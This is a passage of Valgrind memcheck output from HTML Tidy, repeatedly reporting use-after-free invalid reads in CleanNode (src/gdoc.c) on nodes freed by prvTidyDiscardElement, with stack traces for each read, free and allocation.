==1752197== at 0x41D2E6: CleanNode (src/gdoc.c:113)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b921b8 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D318: CleanNode (src/gdoc.c:115)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b921b8 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D327: CleanNode (src/gdoc.c:115)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b921b8 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D3BF: CleanNode (src/gdoc.c:131)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b921a8 is 40 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D204: CleanNode (src/gdoc.c:101)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b92198 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D213: CleanNode (src/gdoc.c:103)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b92198 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D22A: CleanNode (src/gdoc.c:105)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b98940 is 16 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x434C9F: prvTidyTextToken (src/lexer.c:1568)
==1752197== by 0x437680: GetTokenFromStream (src/lexer.c:2649)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 4
==1752197== at 0x430E9F: prvTidynodeIsElement (src/tags.c:1053)
==1752197== by 0x41D23A: CleanNode (src/gdoc.c:107)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b98980 is 80 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x434C9F: prvTidyTextToken (src/lexer.c:1568)
==1752197== by 0x437680: GetTokenFromStream (src/lexer.c:2649)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D253: CleanNode (src/gdoc.c:109)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b98d88 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D262: CleanNode (src/gdoc.c:109)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b98d88 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D28B: CleanNode (src/gdoc.c:111)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b98d88 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D29A: CleanNode (src/gdoc.c:111)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b98d88 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D2D7: CleanNode (src/gdoc.c:113)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b98d88 is 56 bytes inside a block of size 104 free'd
